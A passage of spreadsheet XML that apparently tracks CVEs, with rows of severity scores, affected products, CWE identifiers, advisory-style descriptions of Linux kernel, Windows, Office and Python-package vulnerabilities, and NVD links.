      <c r="M727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52987</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53000</t>
        </is>
      </c>
      <c r="C728" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G728" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H728" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I728" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L728" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nat: use kfree_rcu to release ops
Florian Westphal says:
"Historically this is not an issue, even for normal base hooks: the data
path doesn't use the original nf_hook_ops that are used to register the
callbacks.
However, in v5.14 I added the ability to dump the active netfilter
hooks from userspace.
This code will peek back into the nf_hook_ops that are available
at the tail of the pointer-array blob used by the datapath.
The nat hooks are special, because they are called indirectly from
the central nat dispatcher hook. They are currently invisible to
the nfnl hook dump subsystem though.
But once that changes the nat ops structures have to be deferred too."
Update nf_nat_register_fn() to deal with partial exposition of the hooks
from error path which can be also an issue for nfnetlink_hook.</t>
        </is>
      </c>
      <c r="M728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53000</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53009</t>
        </is>
      </c>
      <c r="C729" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G729" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H729" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I729" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L729" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: fix double-free of tx_buf skb
If ice_tso() or ice_tx_csum() fail, the error path in
ice_xmit_frame_ring() frees the skb, but the 'first' tx_buf still points
to it and is marked as valid (ICE_TX_BUF_SKB).
'next_to_use' remains unchanged, so the potential problem will
likely fix itself when the next packet is transmitted and the tx_buf
gets overwritten. But if there is no next packet and the interface is
brought down instead, ice_clean_tx_ring() -&gt; ice_unmap_and_free_tx_buf()
will find the tx_buf and free the skb for the second time.
The fix is to reset the tx_buf type to ICE_TX_BUF_EMPTY in the error
path, so that ice_unmap_and_free_tx_buf().
Move the initialization of 'first' up, to ensure it's already valid in
case we hit the linearization error path.
The bug was spotted by AI while I had it looking for something else.
It also proposed an initial version of the patch.
I reproduced the bug and tested the fix by adding code to inject
failures, on a build with KASAN.
I looked for similar bugs in related Intel drivers and did not find any.</t>
        </is>
      </c>
      <c r="M729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53009</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53016</t>
        </is>
      </c>
      <c r="C730" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G730" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H730" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I730" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-805</t>
        </is>
      </c>
      <c r="L730" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: ccp - copy IV using skcipher ivsize
AF_ALG rfc3686-ctr-aes-ccp requests pass an 8-byte IV to the driver.
ccp_aes_complete() restores AES_BLOCK_SIZE bytes into the caller's IV
buffer while RFC3686 skciphers expose an 8-byte IV, so the restore
overruns the provided buffer.
Use crypto_skcipher_ivsize() to copy only the algorithm's IV length.</t>
        </is>
      </c>
      <c r="M730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53016</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53185</t>
        </is>
      </c>
      <c r="C731" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G731" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H731" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I731" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>CWE-364, CWE-416</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix use-after-free in zram_bvec_write_partial()
zram_read_page() picks the sync or async backing device read path based on
whether the parent bio is NULL.  zram_bvec_write_partial() passes its
parent bio down, so for ZRAM_WB slots the read is dispatched
asynchronously and zram_read_page() returns 0 while the bio is still in
flight.  The caller then runs memcpy_from_bvec(), zram_write_page() and
__free_page() on the buffer, leaving the async read to write into a freed
page.
zram_bvec_read_partial() was switched to NULL in commit 4e3c87b9421d
("zram: fix synchronous reads") for the same reason; the write_partial
counterpart was missed.</t>
        </is>
      </c>
      <c r="M731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53185</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54757</t>
        </is>
      </c>
      <c r="C732" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G732" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L732" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, Trestle is vulnerable to server-side template injection that can lead to remote code execution. This occurs because the MDCleanInclude and MDSectionInclude Jinja2 tags re-parse untrusted Markdown content as template source code using a non-sandboxed jinja2.Environment. An attacker who controls content that Trestle renders, such as a crafted workspace Markdown file, a third-party SSP document, or a YAML lookup-table value, can inject a Jinja2 expression that traverses Python object internals to execute arbitrary operating system commands in the context of the Trestle process. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54757</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55426</t>
        </is>
      </c>
      <c r="C733" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G733" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations, and Linuxfabrik Monitoring Plugins uses those modules to run external monitoring commands. From the earliest affected releases until linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0, check plugins embedded user-controlled values in command strings passed to lib.shell.shell_exec(), which split strings at pipe characters and executed the resulting commands. In check-plugins/restic-check/restic-check, the --repo parameter could inject a pipe-delimited command into a constructed restic invocation, and sudo-authorized execution allowed a compromised nagios or icinga account to run that command as root. The shared library also accepted command strings and a shell parameter, while numerous plugins constructed external commands from attacker-influenced arguments. The fixes require argv lists, always use shell=False, remove pipe splitting, and reject option-like positional values through lib.shell.safe_cli_value(). These issues are fixed in linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0.</t>
        </is>
      </c>
      <c r="M733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55426</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55522</t>
        </is>
      </c>
      <c r="C734" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G734" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>CWE-426, CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions 3.9.26 through 4.6.57 of praiseonai and 0.12.12 through 1.6.57 of praiseonaiagents, the workflow "include" feature is vulnerable to code execution. Workflow._execute_include() implicitly imports and runs an included recipe's tools.py via a raw importlib.util.spec_from_file_location() and spec.loader.exec_module() call, without honoring the PRAISONAI_ALLOW_TEMPLATE_TOOLS/PRAISONAI_ALLOW_LOCAL_TOOLS autoload opt-in gates or routing through the centralized safe loader that protects the other tools.py autoload paths. As a result, a workflow that includes an attacker-controlled local recipe directory executes arbitrary module-level Python code during include setup, before any child workflow parsing or model call, and the same sink is reachable through the higher-level praisonai.recipe.run() recipe API. An attacker who can cause a victim process to run a workflow or recipe that includes an untrusted local recipe achieves arbitrary Python code execution as the PraisonAI process user, a variant that bypasses the hardening applied to the previously disclosed automatic tools.py RCE advisory family. This issue has been fixed in version 4.6.58 of praisonai and 1.6.58 of praisonaiagents.</t>
        </is>
      </c>
      <c r="M734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55522</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="C735" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G735" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="C736" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G736" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="C737" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G737" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57170</t>
        </is>
      </c>
      <c r="C738" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G738" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions prior to 3.12.4 and 4.0.0 through 4.0.3, the custom Jinja2 include tags mdsection_include and md_clean_include re-parse the content of an included Markdown file as Jinja2 template code in a non-sandboxed environment, allowing server-side template injection that can lead to arbitrary code execution. The MDSectionInclude and MDCleanInclude tags in Trestle/core/jinja/tags.py pass included file content to Parser(self.environment, ...).parse(), splicing it into the host template's compilation, and the environment is a plain jinja2.Environment rather than a SandboxedEnvironment, so any expressions in the file are evaluated with full access to the usual SSTI gadget chain. Because Trestle's Markdown writers emit OSCAL prose and component-description fields verbatim, applying delimiter neutralization only to parameter tables, attacker-controlled OSCAL data such as a control statement, part prose, or component description containing Jinja2 syntax flows into an included Markdown file and is executed when the include tag re-parses it. This issue is fixed in version 4.1.0.</t>
        </is>
      </c>
      <c r="M738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57170</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="C739" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G739" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L739" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="C740" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G740" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L740" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="C741" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G741" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="C742" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G742" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="C743" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G743" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H743" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="C744" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G744" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62886</t>
        </is>
      </c>
      <c r="C745" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G745" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, .net</t>
        </is>
      </c>
      <c r="H745" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="I745" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in .NET allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62886</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64372</t>
        </is>
      </c>
      <c r="C746" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G746" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H746" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I746" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: pcc: fix use-after-free and double free in _OSC evaluation
pcc_cpufreq_do_osc() calls acpi_evaluate_object() twice for the
two-phase _OSC negotiation. Between the two calls it freed
output.pointer but left output.length unchanged. Since
acpi_evaluate_object() treats a non-zero length with a non-NULL
pointer as an existing buffer to write into, the second call wrote
into freed memory (use-after-free). The subsequent kfree(output.pointer)
at out_free then freed the same pointer a second time (double free).
Reset output.pointer to NULL and output.length to ACPI_ALLOCATE_BUFFER
after freeing the first result, so ACPICA allocates a fresh buffer for
each phase independently.</t>
        </is>
      </c>
      <c r="M746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64372</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64375</t>
        </is>
      </c>
      <c r="C747" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G747" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H747" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I747" s="5" t="inlineStr">
        <is>
